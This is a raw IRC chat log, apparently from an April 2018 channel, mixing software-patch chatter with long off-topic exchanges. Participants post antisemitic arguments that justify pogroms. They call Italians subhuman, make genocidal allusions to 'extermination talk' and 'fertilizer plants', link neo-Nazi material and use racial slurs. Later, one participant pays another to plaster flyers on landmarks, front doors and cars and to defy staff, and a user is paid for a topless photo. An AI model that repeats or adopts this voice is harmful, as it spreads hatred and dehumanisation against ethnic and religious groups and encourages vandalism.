into that stack. 1793827;1523075992;mircea_popescu;whole fucking thing is browser candy for the masses, aka "linux". 1793828;1523076006;mircea_popescu;now, why they opted to do it poorly and scatter-piss-idly instead of straight up is anyone's guess. 1793829;1523076026;mircea_popescu;phf it's just a genesis, why multiple patches ? 1793830;1523076104;phf;was supposed to be btcbase/patches, like "patches" as a not very descriptive name of the section where vpatches are stored 1793831;1523076160;mircea_popescu;oh 1793832;1523076198;mircea_popescu;anyway, meanwhile binary bits were discovered in there, so it'll likely change still. 1793833;1523076243;phf;yeah, saw in logs, i'm going to throw it at the patcher anyway to see if it behaves 1793834;1523076622;phf;also in gnu patch news http://rachelbythebay.com/w/2018/04/05/bangpatch/ 1793835;1523076818;mircea_popescu;lel 1793836;1523076944;mircea_popescu;and on the old films front, "20`000 years in sing sing" is a gnarly piece of nonsense about on there with "the room". except with spencer tracy playing the incomprehensible retard. 1793837;1523077324;phf;so bad, it's not even worth a trilema review. a byline in logs at most. 1793838;1523077350;mircea_popescu;too remarkably bad to not say anything at all. 1793839;1523077475;mircea_popescu;but i mean... dat prison-made REVOLVER. with a PERFECTLY WORKING SILENCER. all made out of common prisonhold materials. 1793840;1523077491;mircea_popescu;(pro tip : silencers dun really work on pistols, even with today's materials science.) 1793841;1523077552;phf;you cut put a silencer on a small caliber subsonic rounds, and then you're going to get a very satisfying "tink tink tink" sound, but that's not going to have any kind of stopping power. 1793842;1523077556;phf;*can 1793843;1523077566;mircea_popescu;no but listen, a revolver, right ? it revolves. how does it revolve ? 1793844;1523077575;mircea_popescu;are you going to put caulk in the space it revolves through ? or what ? 1793845;1523077575;phf;oh oh, right 1793846;1523077591;phf;i missed the revolver part 1793847;1523077677;asciilifeform;nagant -- silenceable 1793848;1523077706;mircea_popescu;leaving aside how you even make revolvers out of whatever dubious zamak. i mean yes i've seen prison made firearms, but they were without exception single round sorta things. 1793849;1523077706;asciilifeform;( has that oddball expanding neck shell and cylinder that racks forward, closing the gap ) 1793850;1523077734;mircea_popescu;gas seal thing 1793851;1523077747;asciilifeform;aha 1793852;1523077832;asciilifeform;interestingly, after half century pause, nagant rounds being made again, commercially -- iirc serbia 1793853;1523077895;mircea_popescu;was kind of a big deal for a while, that. 1793854;1523077921;mircea_popescu;anyway ; the item in the film is not a nagant. 1793855;1523077926;phf;i'm not sure what the comparisons to the room mean at this point. i suspect it means "it's not really `so bad it's good`, it's really just dull bad, and you should avoid it", or? 1793856;1523077941;mircea_popescu;oh, and you should see their lock knock system! it looks like a converted sewing machine! 1793857;1523077964;mircea_popescu;phf it means it does not map to any sort of rational, coherent, non-contradictory model of the world. 1793858;1523078039;mircea_popescu;whether one enjoys this or not is muchly a case of mood, i suspect. there's nothing intrinsicly good or valuable about it, it's like pareidolia except not about faces, but about stories. if you see something in there, you brought the something you see from home. 1793859;1523078141;phf;hmm, i can see that 1793860;1523078204;mircea_popescu;items like the celebrated http://trilema.com/wp-content/uploads/2012/08/cina-cea-de-lol.jpg ; is it art ? if you think so, it's definitely not because of it. 1793861;1523078370;phf;that's also a lot more generous than my "goddamn kids trying to force a cult following out of a turd" 1793862;1523078663;mircea_popescu;no but see, it's a fundamental problem of the meta-world. it's not JUST pareidolia that is a very specific disease by which man born after 1990 can be well set apart from man in general. it's also a confusion between pets, ie animals, and cartoon characters, ie fictitious people as discussed in http://trilema.com/2015/peripateticists-kinda-except-girls-not-boys-bare-cunt-instead-of-toga-and-walking-around-the-house-not-the-ga 1793863;1523078663;mircea_popescu;rden-but-otherwise-exactly-the-same/ and "peta" and "stereotypes" and the whole rest of it. 1793864;1523078688;mircea_popescu;could readily argue that it's a cognitive revolution on the level of the original "voices in head" multicameral mind, in impact, effects, whatever. 1793865;1523078706;mircea_popescu;people today literally lost the ability to conceptualize the negative space between ontology and characterisation. 1793866;1523078762;mircea_popescu;which is the deep problem we reference now and again with the "original penguin" stories. "nobody told me that the men with guns can very well kill me" is not the idle protestation of a retard, but the desperate cry of a broken mind that literally DOES NOT REALISE things that weren't on the spec sheet may indeed exist. 1793867;1523078800;mircea_popescu;which is why they make such terrible programmers, "i didn't tell the computer to give out root, why did it ?!" ; and which is why they make such terrible partners, "i did not consent to my asshole being sore after fucking!!1". 1793868;1523078829;mircea_popescu;it all comes down to the same "how can something exist that's not SAID", which is what's at work here too. 1793869;1523078871;mircea_popescu;and obviously the driver of that is, "there's so much said, it's a deluge already, even without considering anything else. so we're not gonna." 1793870;1523079180;mircea_popescu;in any case, all to the last of the paralogic, cvasirational behaviours of the neet, the pantsuit, the modern man generally all come back to this exact problem, of misrepresenting ontology as a subset of gnoseology, "things that exist are those among the things that are said which also had the 'exists' attribute set." 1793871;1523079207;mircea_popescu;needless to say never before was this insanity seriously contemplated, of having reality as a subset of representation. 1793872;1523079376;mircea_popescu;"but mp, you agree the cardinal of the set of all the things that can be represented is larger than the cardinal of the set of all the things that can be" "of course" "so then you say the set of things that are necessarily contains the set of things that can be represented ?" "yes" "but this is self-contradictory!" "hurr. there's more reals than there's rationals, and the happenstance that each rational can be denoted as an i 1793873;1523079376;mircea_popescu;nfinity of nominally different fractions doesn't help this. yes 2/4 3/6 4/8 etc etc. you still can't touch pi, and pi shall bury you." 1793874;1523081457;mircea_popescu;hanbot http://p.bvulpes.com/pastes/Xvx31/?raw=true asciilifeform http://p.bvulpes.com/pastes/d5CDT/?raw=true 1793875;1523111258;mircea_popescu;aand in today's quora lulz, https://philosophy.stackexchange.com/questions/50581/why-am-i-committing-a-fallacy-when-i-am-just-insulting-someone 1793876;1523111314;mircea_popescu;(tl;dr : pantsuit spazzing out over fundamental challenge to their "rationalist" ideals whereby "discussion is only for arguments", "characterization is noise" and all the rest of the "we are an equal bunch that can never be punched" "science") 1793877;1523115366;BingoBoingo;http://btcbase.org/log/2018-04-07#1793817 << lean and slow, but surviving. The locals continue to unimpress, the immigrants continue to impress by comparison. The congested head phase of this cold has lead to the odd situation this week where apparently everything I say is intelligible to the locals, but I can't process their auditory noise at all. 1793878;1523115378;BingoBoingo;And fxd 1793879;1523115545;BingoBoingo;http://btcbase.org/log/2018-04-07#1793860 << I raise you http://www.thedrinkingrecord.com/wp-content/uploads/2018/02/P1000248-e1518218404440-768x1024.jpg 1793880;1523115748;*;BingoBoingo becoming increasingly racist against Italians 1793881;1523115764;mircea_popescu;italians suck. 1793882;1523115799;BingoBoingo;Until arriving I here I had no idea how much 1793883;1523115866;BingoBoingo;They aren't people 1793884;1523115927;BingoBoingo;The street dogs have more live intelligence among them 1793885;1523115986;mircea_popescu;yet another obscure detail we agree upon 1793886;1523116198;BingoBoingo;"We waz kangz" is ridiculous whether it is the africans or wops claiming it https://archive.is/9Dz1z 1793887;1523116608;BingoBoingo;But the detail is less obscure when I am surrounded by them. Or maybe pessimissm is contagious. I disappoints me a bit that I have yet to meet other immigrants interested in extermination talk yet. 1793888;1523116637;BingoBoingo;Biobags, biodiesel, fertilizer plants... 1793889;1523117057;mircea_popescu;phf is the bot dead again ? 1793890;1523117147;mircea_popescu;BingoBoingo and yet, they made about half of all the movies ever made worth watching. 1793891;1523117250;BingoBoingo;Those were also the ones good enough to stay in Italy. 1793892;1523117342;asciilifeform;ave1: i regret to say that us post office has a new and fresh fascism , they returned the fg : 'return address must show full legal name' (it had 's.' , for many years was ok, nao apparently not ) . pretty good scam they run, get folx to pay twice for postage, resending. next they will reject because white envelopes will be disallowed, i expect.. 1793893;1523117382;asciilifeform;phf: yer bot is dead again ? 1793894;1523117383;mircea_popescu;asciilifeform war on drugs. 1793895;1523117410;asciilifeform;mircea_popescu: gotta be. tho it dun fully explain it, there was whole separate form that got stapled to it, with names, addresses, errything short of fingerprint 1793896;1523117417;asciilifeform;but apparently now ~envelope also~ 1793897;1523117451;asciilifeform;http://logs.bvulpes.com/trilema?d=2018-4-7#327417 << this is good idea , mircea_popescu , i'ma make it happen 1793898;1523117451;mimisbrunnr;Logged on 2018-04-07 06:01 mircea_popescu: hanbot http://p.bvulpes.com/pastes/Xvx31/?raw=true asciilifeform http://p.bvulpes.com/pastes/d5CDT/?raw=true 1793899;1523117468;asciilifeform;was thinking about something similar earlier. 1793900;1523117472;mircea_popescu;cool. 1793901;1523117588;mircea_popescu;speaking of fingerprints, it's becoming a latam tradition to require fingerprints with various paperwork. whole thing has a very collapse-into-preliterate-times flavour to it 1793902;1523117625;mircea_popescu;(incidentally, since nothing is explained anywhere anymore : the REASON iliterate folk singed as an X was that then they'd put their thumb on the fresh ink dropped in that pattern. it wasn't a blank X.) 1793903;1523117723;*;BingoBoingo awaits Iraq style "dye you fingers after voting" to come to el Norte 1793904;1523118231;phf;oh ffs 1793905;1523118466;phf;some of the ips from that list we had long time ago have turned into tarpits. the bot will connect, then just sit there until connection timeouts 1793906;1523118488;asciilifeform;phf: which list was this 1793907;1523118503;mircea_popescu;asciilifeform you recall, freenode proxies pre "openinternetaccess" ie usg takeover. 1793908;1523118508;phf;http://btcbase.org/log/2016-09-25#1548402 1793909;1523118508;a111;Logged on 2016-09-25 01:47 mircea_popescu: phf,,,,,,,,, << pick from there 1793910;1523118509;asciilifeform;aaaa 1793911;1523118675;BingoBoingo;!~later tell Trinque Happy Birthday and Congrats on crossing Block 400000 1793912;1523118675;jhvh1;BingoBoingo: The operation succeeded. 1793913;1523118953;mircea_popescu;and in today's dose of scholarship : the texts of the catholic church endured unchanged for at the least eleven centuries : from the gelasian sacramentary or before, until the 1950s. at this point, the long held tradition of praying "et pro perfidis judaeis" became insufferable. at first giuseppe pacelli declared that "perfidis" in the original does not mean perfidious, but faithless. then roncalli made this an official rule 1793914;1523118954;mircea_popescu;at first, then took the adjective out altogether. then vatican 2 took out the reference to the "veil on the hearts of jews" also, because "possibility of misinterpretation". 1793915;1523119002;mircea_popescu;the funny bit in all of this is that very much yes, the latin "per-fides" much like "per-jury" and other constructions surviving to this day denotes quite literally, faithless, "with a broken apparatus for the human behaviour commonly known as faith". 1793916;1523119023;mircea_popescu;nevertheless, this doesn't actually make the "perfidious" translation incorrect. that's fucking exactly what the term means today, also. 1793917;1523119064;mircea_popescu;that it so happens perfidious has a lot of literary skirting putting it in its proper context, whereas the novel coinage "faithless" does not is kinda like permitting the gypos to change their name, or calling idiocy or "handicap" something else. 1793918;1523119092;mircea_popescu;you know that the rotten substance will permeate eventualyl the fresh covers, and sooner or later you'll have the same association for the new term as for the old, as the association is earned, not arbitrary. 1793919;1523119122;mircea_popescu;but... somehow pantsuit finds itself subjectively in this position where it has the sovereign authority to keep throwing out people's work, and subject them to having to re-do the same work. 1793920;1523119192;mircea_popescu;"please upgrade to the new prayerbook, [and then take another 1100 years to work out the value of "abraham and his posterity", which just happens to be exactly equal to the original "perfidis judaeis", but whatever, you don't KNOW that, yes, it's not "scientific", what do you feel about the methodlogy ?!?!?]" 1793921;1523119767;mircea_popescu;and of course faith here isn't "religious belief", but faith, quite literally, metaphysical trust. the behaviour that breaks the prisonner's dilemma. 1793922;1523119918;asciilifeform;mircea_popescu: ilkka kokkarinen had a hilarious piece iirc re the changing of words, in almost exactly this formulation 1793923;1523119936;mircea_popescu;kinda hard to escape notice. 1793924;1523120026;mircea_popescu;anyway, i find it hysterical that the ~only possible interpretation of the internet meaning of "jew" today is EXACTLY the meaning that the catholics distilled into their prayerbook, "these dorks can't break out of prisonner's dilemma". 1793925;1523120046;mircea_popescu;unspoken, ununderstood, golum of humanity, forever retracing the same potholes. 1793926;1523120209;mircea_popescu;but it certainly puts some cold water on any progressive verbiage. "the people" of today are EXACTLY as smart as the people of forever. euclids, eulers, etceteras come and go, but the problems of reality REMAIN, and remain identically the same, irrespective of the "progress" at the top of the representational hierarchy. what does it help anyone or anything that i sit here and express this in context informed by a three to fiv 1793927;1523120209;mircea_popescu;e millenary cultural tradition, when i'm expressing the exact same things expressed by a similar guy on a history half this tall ? 1793928;1523120257;mircea_popescu;"oh but mp, jewface 4chan memes are so very DIFFERENT from 1418 easter celebration puppet shows" "i'm sure they are ; and i'm sure you'd know ; because i was there back then and didn't see you in the crowd, so logically you'd know and i wouldn't, hurr." 1793929;1523120371;mircea_popescu;now how the fuck this invariance can exist in the first place, and how the fuck that seeming impossibility ~was implemented~, so that whether possessed of speech only, or of speech and the written word, or of speech + written word + pony express, or of all that + internet, boy still doesn't know what the fuck to say to girl AND ALL THAT... how, really. how ? 1793930;1523120377;mircea_popescu;that's metaphysics right there. 1793931;1523120671;mircea_popescu;anyway, the reason pogroms started happening sometime after 1100 or so and then stopped happening sometime aroun 1900 or so has absolotely NOTHING to do with "antisemitism" or "hatred", circle of ~ or not whatever. zilch whatsoever at all. 1793932;1523120688;ave1;http://btcbase.org/log/2018-04-07#1793892, Sorry asciilifeform, this is probably my very very stupid mistake, I checked the address I gave you just now and seem to have put in the old street I lived on with the new housenumber, postal address etc. I do not understand how this could be (both start with an A but other than that no match), and I am very sorry. If you are still willing to send the FG (I hope so) I will repost the address. 1793933;1523120688;a111;Logged on 2018-04-07 16:09 asciilifeform: ave1: i regret to say that us post office has a new and fresh fascism , they returned the fg : 'return address must show full legal name' (it had 's.' , for many years was ok, nao apparently not ) . pretty good scam they run, get folx to pay twice for postage, resending. next they will reject because white envelopes will be disallowed, i expect.. 1793934;1523120752;asciilifeform;ave1: seems like they objected to ~my~ return addr 1793935;1523120763;asciilifeform;ave1: but yes if you have updated addr plz gpg, it will go out mon or tues 1793936;1523120772;mircea_popescu;pogroms started happening because the post-cluny society became economically interdependent to a degree where specific behaviours (as above) were required for its survival. as late as 900, everyone could be "for themselves", and mostly not starve, but by 1300 or so the ONLY chance of alimentary survival in western europe, all of england etc was co-operation. and the faithless behaviour is very much a bar to cooperation, and t 1793937;1523120772;mircea_popescu;hereby a major threat to survival. 1793938;1523120803;mircea_popescu;and pogroms stopped happening because as capitalism integrated this interdependency in a more comprehensible conceptual graph, they were no longer blindly necessary. and they're expensive as fuck, so. went bye-bye. 1793939;1523120828;mircea_popescu;pointedly absent in all of this, any giving of a shit ~whatsoever~ about jews in their subjective sense, of "son of my mom" or w/e it is. 1793940;1523120861;ave1;thx asciilifeform, will post it a little later! 1793941;1523120930;mircea_popescu;so rather than taking the "perfidis judaeis" out of the catholic prayerbook, how about replacing all the instances of inept economy discussion on the internet about how 1000 people fish in a pond and then the pond loses productivity and bob comes up with the idea of not fishing so much but abraham BREAKS FAITH with what it fucking is. "the jew jewed the all-filter agreement, duh." 1793942;1523121044;mircea_popescu;anyway, i'm done. sorry for the lengthy log spill, it evidently should have been an article but sadly it dribbled into my head in bits and i never realised this. 1793943;1523121101;BingoBoingo;Sometime heads work like that 1793944;1523121117;mircea_popescu;with age especially! 1793945;1523133084;lobbes;!~ticker --market all 1793946;1523133089;jhvh1;lobbes: Bitstamp BTCUSD last: 7010.0, vol: 7642.76183137 | Bitfinex BTCUSD last: 7007.5, vol: 41687.36960522 | Kraken BTCUSD last: 7006.6, vol: 6323.66638176 | Volume-weighted last average: 7007.74105462 1793947;1523133843;lobbes;!!invoice ben_vulpes 0.0438 materials procurement (2018-4-7) 1793948;1523133849;deedbot;Get your OTP: http://p.bvulpes.com/pastes/NrMfV/?raw=true 1793949;1523133887;lobbes;!!v 3F7AFF0CB02D69437B47D856AF0C9231C63AC99D2D4AAA2C23C9266DC9C9495B 1793950;1523133890;deedbot;Invoiced ben_vulpes 0.0438 << materials procurement (2018-4-7) 1793951;1523134286;mod6;!!invoice ben_vulpes 0.09169539 2 x Samsung EVO 860 1Tb SATA III SSD (2018.04.05) For S.MG box. 1793952;1523134290;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ew4Qy/?raw=true 1793953;1523134301;mircea_popescu;BURY HIM 1793954;1523134314;mircea_popescu;!!invoice ben_vulpes money plox 1793955;1523134320;deedbot;Get your OTP: http://p.bvulpes.com/pastes/anxui/?raw=true 1793956;1523134335;mircea_popescu;anxui huh ? 1793957;1523134421;mod6;!!v A6331853F44B13AB77F0A33CB3F6AAA9C9A7A212432EB20567803EA4F31E4117 1793958;1523134424;deedbot;Invoiced ben_vulpes 0.09169539 << 2 x Samsung EVO 860 1Tb SATA III SSD (2018.04.05) For S.MG box. 1793959;1523134474;mod6;heheh, just figured I'd follow lobbes' lead there :] 1793960;1523134969;deedbot;http://www.thedrinkingrecord.com/2018/04/07/the-italian-problem-a-brief-history-of-uruguay/ << Bingo Blog - The Italian Problem: A Brief History Of Uruguay 1793961;1523135328;mircea_popescu;BingoBoingo sounds pantsuit alright. "united losers" is 100% how they do things. 1793962;1523135501;BingoBoingo;mircea_popescu: Well, blog is a sorta notebook thing. Gotta start keeping notes on this shit for the terraforming. 1793963;1523135584;BingoBoingo;Fat Forehead is first and foremost, an ITALIAN political creature. Only united in the sense that they all know they are losers. 1793964;1523135707;mircea_popescu;"Today the Italians rule this world by proxy. They get others to fight and die for them... They invented socialism, communism, human rights and democracy so that persecuting them would appear to be wrong, so that they can enjoy equal rights with others. With these they have gained control of the most powerful countries and they, this tiny community, have become a world power." 1793965;1523135710;mircea_popescu;~Mahathir Mohammed 1793966;1523135908;BingoBoingo;It's what they get for teaming up with the Jews to kill baby Jesus 1793967;1523135934;mircea_popescu;right, cuz pontus pillate was italian! 1793968;1523136037;BingoBoingo;And Italians HATE freedom. Freedom means other people could do things and make them look bad. The Italian agenda means pushing to ban doing things 1793969;1523136128;BingoBoingo;And having wrecked their own Italian, the Italians... like the J00z live in a diaspora 1793970;1523137469;mircea_popescu;aaand in other judensaus, http://www.rexmag.com/reviews/star-images/bbw-forever-zanie-janette.jpg 1793971;1523138402;BingoBoingo;Piggie loves when the farmer makes her squeal 1793972;1523138564;BingoBoingo;In other developments of old country... They finally learned to take pictures of their flyers https://dailystormer.name/stormer-book-clubs-operation-white-america-a-smashing-success/ 1793973;1523139481;asciilifeform;lol, 'the coke can on the right'(tm)(r) 1793974;1523139586;BingoBoingo;They disappoint me with how unwoke they are to the I-talian menace 1793975;1523140026;mircea_popescu;they apparently haven't learned how not to sound like fringers with tiny dicks. 1793976;1523140050;mircea_popescu;SMASHING SUCCESS!!!! wrote nigar on bathroom stall in highschool!!11 1793977;1523140406;BingoBoingo;Apparently the tone is intentional. They claim most of their readership is under 24. Apparently in this narrative the kids following the millenials are "Generation Zyklon" 1793978;1523140491;BingoBoingo;The sales pitch is "That cool black kid on the sportsball team keeping you down. It's ok to call him a coon" 1793979;1523140824;BingoBoingo;Kids eat shit. 1793980;1523144526;mircea_popescu;w/e.. 1793981;1523144660;mircea_popescu;amusingly, this is actually less a "smashing success" than the celebrated http://trilema.com/2013/the-gentlemen-prefer-coeds-club/ http://trilema.com/2014/five-bucks-for-great-justice/ lulz. 1793982;1523144709;mircea_popescu;but you know, why take one's rightful place as a tiny item in a larger thing when could hallucinate optionalities and self-importances all day long, and all that. 1793983;1523150966;douchebag;mircea_popescu: You know 1793984;1523150980;douchebag;I really like what you just linked 1793985;1523151004;douchebag;"much smarter girls actually enjoy that very privilege you keep checking." 1793986;1523151365;douchebag;If you want me to throw fliers up all over Chicago 1793987;1523151366;douchebag;let me know 1793988;1523151409;douchebag;Anywhere you want 1793989;1523151525;mircea_popescu;douchebag sure, hit it. 1793990;1523151540;douchebag;Can you link me what to print out ? 1793991;1523151558;mircea_popescu;the article you linked works fine. 1793992;1523151566;mircea_popescu;im sorry. the article you liked* 1793993;1523151567;deedbot;http://barksinthewind.com/2018/vtools-keccak-regrind/ << BARKS IN THE WIND - vtools complete keccak prerelease 1793994;1523151589;douchebag;http://trilema.com/2013/the-gentlemen-prefer-coeds-club/ 1793995;1523151593;douchebag;^ this one, correct ? 1793996;1523151594;mircea_popescu;sure. 1793997;1523151607;douchebag;And I'll be rewarded for my efforts? 1793998;1523151615;mircea_popescu;sure. what do you want to make ? 1793999;1523151637;douchebag;You're the one with the bitcoin, just tell me where 1794000;1523151661;douchebag;I'll put them near major tourist attractions 1794001;1523151697;mircea_popescu;if memory serves the fiverr doods did something like 50 or 100 or so for five bux, but whatever, you're in the l2, what's minimum wage in your state ? 1794002;1523151716;douchebag;Trump Tower, Willis (Sears) Tower, Cloud Gate 1794003;1523151722;mircea_popescu;12 bux huh ? so do a day, that's $96, see what you can deliver for it. 1794004;1523151748;douchebag;Awesome 1794005;1523151799;phf;http://barksinthewind.com/2018/vtools-keccak-regrind/ << mircea_popescu, asciilifeform, trinque, mod6 reground vtools with a manifest file , hanbot should be everything to make a patch, get a working press 1794006;1523151804;mircea_popescu;get them printed on autoadhesive paper, it;s not expensive. 1794007;1523151809;douchebag;If I need to print off these flier, if I include the reciept of the printed fliers will you remburse them ? 1794008;1523151811;mircea_popescu;phf saw it yup 1794009;1523151841;mircea_popescu;douchebag if it's not something crazy. 1794010;1523151865;douchebag;Forsure 1794011;1523151898;douchebag;Because I could get easily 500 of these spread across Chicago in about 2 hrs 1794012;1523151931;douchebag;I'll do batches of 100 1794013;1523151948;mircea_popescu;o.O 1794014;1523151953;mircea_popescu;sure, knock yourself out. 1794015;1523151956;douchebag;Also, if there are any particular places you want me to put them 1794016;1523151964;douchebag;Let me know, 1794017;1523151966;mircea_popescu;i don't really care, you know the place better than me. 1794018;1523151984;douchebag;Alright, do I get a bonus if any news organizations pick it up? 1794019;1523151984;mircea_popescu;wherever young sluts are liable to be found that waste their slut potential on idiotic pantsuit ideologies. 1794020;1523152001;mircea_popescu;douchebag sure, you get $50 per interview i give lol. 1794021;1523152036;douchebag;Sounds good friend! Will execute this within the next week or so 1794022;1523152052;mircea_popescu;douchebag one thing : if you do multiple batches, you might consider using multiple headers maybe ? 1794023;1523152079;mircea_popescu;alter the in the page with whatever found at that url and you're g2g 1794024;1523152102;douchebag;Awesome 1794025;1523152112;phf;this is like tmsr take on un prophète 1794026;1523152125;mircea_popescu;though if you put the fawkes chicks in there da polis may pick you up ? i dunno. 1794027;1523152141;mircea_popescu;phf i can see the angle huh! 1794028;1523152203;douchebag;I'll keep it lowkey 1794029;1523152391;hanbot;ahh, #trilema-lowkey, that lonely shuffle-parlor 1794030;1523152407;mircea_popescu;lol. 1794031;1523152413;mircea_popescu;have we done a low key thing yet ? 1794032;1523152484;douchebag;By low key, I mean I'll put them in high traffic areas 1794033;1523152499;mircea_popescu;hehe 1794034;1523152499;douchebag;but I'm not going to stick around too long, I will provide photos 1794035;1523152507;mircea_popescu;douchebag do you have a blog yet ? 1794036;1523152560;douchebag;Not yet, I was planning on putting it on the server I should be getting within the next week or two ish ? 1794037;1523152574;mircea_popescu;seems like the eminent place for the pics / story of the adventure. 1794038;1523152606;douchebag;hahaha that sounds like a good idea 1794039;1523152614;douchebag;will provide many lulz 1794040;1523152619;mircea_popescu;indeed. 1794041;1523152950;hanbot;douchebag there's a bitcent from me in it for you if you get a snap of a trilema printout in the Seminary Co-op bookstore near U of Chicago there. 1794042;1523153038;douchebag;Awesome 1794043;1523153206;douchebag;Will do 1794044;1523153268;douchebag;Any other requests? Skyscrapers, Buildings, Peoples front doors, People's cars, ect... 1794045;1523154254;asciilifeform;douchebag: palmer hotel 1794046;1523154273;asciilifeform;and the 'fine arts bldg' lobby 1794047;1523154350;douchebag;forsure 1794048;1523155248;lobbes;only thing I remember from my few Chicago visits was that metallic bean thing. Was a high-foot traffic area iirc 1794049;1523155337;douchebag;Yeah that's cloud gate 1794050;1523155346;douchebag;I'm planning on sticking a flyer directly on the bean 1794051;1523155394;lobbes;haha nice 1794052;1523155417;douchebag;Yeah man, I'm not too shy when it comes doing shit like this 1794053;1523155458;douchebag;https://i.imgur.com/rg1burF.png 1794054;1523155468;douchebag;I'll stick one right on the skydeck in Willis Tower too 1794055;1523155479;douchebag;That'll cost money though if I remember correctly 1794056;1523155534;douchebag;I think it will be a real fun day, especially telling the workers at these places to fuck off while they're threatening to call the cops on me 1794057;1523157640;mircea_popescu;http://btcbase.org/log/2018-04-06#1793484 << basically the "girl gets restless on farm, joins gypsy caravan to get pregnant" story retold, in up to date terms. i suppose the slice of about-read-to-great-again us as the third world shithole it ~actually~ is has some documentary value. 1794058;1523157640;a111;Logged on 2018-04-06 01:08 gabriel_laddel: mircea_popescu American Honey review, or totally unwatchable? 1794059;1523157686;mircea_popescu;otherwise, it's made by people who haven't the first clue re principal cinematography, editing, purchasing, anything. the script is evidently laboured, and not terrible. it takes a lot of effort to rise to the level of unremarkable in that field. 1794060;1523157743;mircea_popescu;anyway, a sort of "pennsylvania magical realism" if you will, where "magazine subscription" selling outfit doesn't need a SOP for dealing with hookers, because they're not everyu other recruit ; nor are there any pimps to burn down your shit for turning tricks in their hick town ; and you can safely go for attempted murder + gta in rural texas and get away with it np. 1794061;1523157807;mircea_popescu;they evidently have nfi who adriana was, for instance, judging by how chick misses out on drowning for a closer. it's just... i'd pass them if they were in my hs cinema school, and throw away the tape. 1794062;1523157820;mircea_popescu;hs cinema class* 1794063;1523157926;mircea_popescu;http://btcbase.org/log/2018-04-08#1794056 << lol enjoy. 1794064;1523157926;a111;Logged on 2018-04-08 02:45 douchebag: I think it will be a real fun day, especially telling the workers at these places to fuck off while they're threatening to call the cops on me 1794065;1523164629;mircea_popescu;douchebag in any case, get them printed on authoadesive paper. way the fuck better than putting a tack in or scotch tape or w/e bs. you know what i mean ? paper though, not pvc that's unprintable. 1794066;1523191296;douchebag;mhmm 1794067;1523204431;ave1;asciilifeform: http://p.bvulpes.com/pastes/Chyyv/?raw=true, updated address 1794068;1523206356;douchebag;morning mircea_popescu 1794069;1523206631;mircea_popescu;heya 1794070;1523208419;mircea_popescu;aaand in today's cult leaders, http://trilema.com/2014/weak-sauce/ 1794071;1523208682;asciilifeform;archive.is seems to be sad again 1794072;1523208698;douchebag;College pisses me off so much 1794073;1523208717;douchebag;I'm glad I'm quitting after this semester 1794074;1523208730;asciilifeform;meanwhile in entomology dept, http://seclists.org/oss-sec/2018/q2/21 1794075;1523208772;asciilifeform;douchebag: what/where exactly are you quitting ? 1794076;1523208819;douchebag;Network Security Specialist associates degree 1794077;1523208825;mircea_popescu;infosec programme at urbana ? /me crosses fingers 1794078;1523208829;mircea_popescu;ahaha. 1794079;1523208837;douchebag;I haven't learned a single thing in the two years I've been here that I didn't already know 1794080;1523208856;asciilifeform;aa tradeschool 1794081;1523208858;mircea_popescu;"it's spoken by those folks who went to school for just one week..." 1794082;1523208927;douchebag;I mean, I like my professors - they have a lot of respect for me, and they are teaching a lot of students a ton of stuff 1794083;1523208952;douchebag;but I spend more time explaining stuff that the professors don't fully comprehend than doing actual work 1794084;1523208975;mircea_popescu;so quit. i never met anyone whom the us scamsystem helped yet. 1794085;1523209016;asciilifeform;how the fuq didja endure 2y of that, douchebag ?? 1794086;1523209051;mircea_popescu;the lower rungs, i guess, people get helped by aa and the mcdonalds "management assisting" programme or w/e, ringing lower middleclass existences out of decidedly working class folk. but... 1794087;1523209058;douchebag;I enjoy helping others 1794088;1523209089;mircea_popescu;douchebag if you spend your time helping others, what are women going to do ? take pills and walk about very very sadly ? 1794089;1523209114;mircea_popescu;in the immortal words of inspector muldoon, "let a good man earn his living", you hear ? 1794090;1523213329;douchebag;I like to think 1794091;1523213347;douchebag;Teach a man to fish sort of deal 1794092;1523213350;douchebag;I don't do work for them 1794093;1523213359;douchebag;But I don't mind answering questions 1794094;1523213459;douchebag;or pointing them in the direction of good resources 1794095;1523213746;mircea_popescu;!!up spool 1794096;1523213747;deedbot;spool voiced for 30 minutes. 1794097;1523213766;spool;hi :) 1794098;1523213770;douchebag;spool is here to show tits 1794099;1523213783;spool;my discord friend douchebag told me you are interested in topless pictures? 1794100;1523213795;spool;I have come to offer my goods ;) 1794101;1523213818;spool;!!register http://p.bvulpes.com/pastes/N3UYL/?raw=true 1794102;1523213821;deedbot;http://qntra.net/2018/04/alleged-chemical-attack-in-syria-follows-trump-talk-about-leaving-syria/ << Qntra - Alleged Chemical Attack In Syria Follows Trump Talk About Leaving Syria 1794103;1523213821;deedbot;234476F7E4FC27F27AC4EECCAFC2A1AE40AB6498 registered as spool. 1794104;1523213834;spool;thx deedbot 1794105;1523213915;douchebag;spool: mircea_popescu is the man who you will be talking to in regards tot hat 1794106;1523213953;spool;awesome, im just browsing the net, lazy sundays, not looking forward to monday ;x 1794107;1523213997;mircea_popescu;wow, spool has a proper client rather than web irc ? 1794108;1523214008;douchebag;she's chatted on IRC before 1794109;1523214011;spool;yea 1794110;1523214025;spool;old anon chats from 4chan 1794111;1523214031;mircea_popescu;spool 600682e5 1794112;1523214034;spool;before all this discord 1794113;1523214041;spool;thx mircea_popescu give me a minute 1794114;1523214045;mircea_popescu;sure. 1794115;1523214308;BingoBoingo; Any other requests? Skyscrapers, Buildings, Peoples front doors, People's cars, ect... << The riverwalk should have some good places to stick some. The corridor between NBC tower and Navy Pier seems a rather high traffic area. 1794116;1523214355;douchebag;Will do! 1794117;1523214356;spool;https://i.imgur.com/Tw4xwT0.jpg 1794118;1523214363;spool;please dont be to hard on me 1794119;1523214439;mircea_popescu;!!pay spool 0.02 1794120;1523214452;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ZShAV/?raw=true 1794121;1523214454;spool;thx luv 1794122;1523214459;mircea_popescu;nono, ty! 1794123;1523214465;spool;so what are you guys about? 1794124;1523214467;mircea_popescu;so other than 4chan and tits, what do you do ? 1794125;1523214474;mircea_popescu;hehe. do you see teh topic ? 1794126;1523214479;spool;douchebag told me some but it sounds wild 1794127;1523214486;mircea_popescu;it is wild. 1794128;1523214495;spool;yea, i will need to cuddle up and read through it, almost fantasy like 1794129;1523214502;mircea_popescu;take your time. 1794130;1523214803;mircea_popescu;spool did you ever post your tits on 4chan ? 1794131;1523214859;spool;no 1794132;1523214862;mircea_popescu;ahaha. 1794133;1523214867;mircea_popescu;hey, want to make another bitcent ? 1794134;1523214872;spool;ive seen too many girls before do that 1794135;1523214881;spool;sure, what do you need? 1794136;1523214884;mircea_popescu;1sec 